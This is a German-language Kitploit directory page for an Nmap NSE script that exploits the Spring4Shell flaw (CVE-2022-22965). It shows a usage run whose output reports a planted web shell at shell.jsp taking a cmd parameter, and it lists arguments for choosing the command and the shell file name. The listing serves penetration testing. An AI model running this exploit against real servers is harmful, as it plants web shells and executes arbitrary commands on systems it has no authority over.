Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nmap-spring4shell — Nmap Spring4Shell NSE-Skript für Spring Boot RCE (CVE-2022-22965) | Kitploit
Tools/GitHubGitHub/gpiechnik2/nmap-spring4shell
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubgpiechnik2/nmap-spring4shell

nmap-spring4shell

Nmap Spring4Shell NSE-Skript für Spring Boot RCE (CVE-2022-22965)

Repository anzeigen
84vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Nmap-spring4shell

Log4shell-nmap ist ein NSE-Skript zur Erkennung von Spring4Shell RCE-Schwachstellen (CVE-2022-22965) in HTTP-Diensten. Das Skript injiziert die korrekte Payload in die Anwendung und führt anschließend den angegebenen Befehl auf dem festgelegten Endpunkt aus.

Schwachstelle

Siehe hier.

Verwendung

root@kitploit:~
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT     STATE SERVICE    REASON  VERSION
8080/tcp open  http-proxy syn-ack
| spring4shell: 
|   VULNERABLE:
|   Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
|     State: VULNERABLE
|     IDs:  CVE:CVE-2022-22965
|     Check results:
|       127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
|     Extra information:
|       TESTED URL: 127.0.0.1:8080
|       COMMAND: id
|       ASSERTION: uid
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965

Argumente

Wir können mehrere Variablen im Skript verwenden. Diese sind wie folgt:

  • endpoint – relative URL. Auf https://bugspace.pl/search/videos wäre dies /search/videos,
  • command – Befehl, der auf dem Server ausgeführt werden soll. Der Standardbefehl ist id,
  • assertion – die überprüfte Zeichenfolge in der Serverantwort. Der Standard-assertion-Wert ist uid,
  • filename – Dateiname auf dem Server. Weitere Informationen finden Sie hier. Der Standardname ist shell.

Zusätzliche Daten

Getestet an Anwendungen von hier und hier

Lizenz

Gleich wie Nmap. Siehe https://nmap.org/book/man-legal.html

Tool herunterladen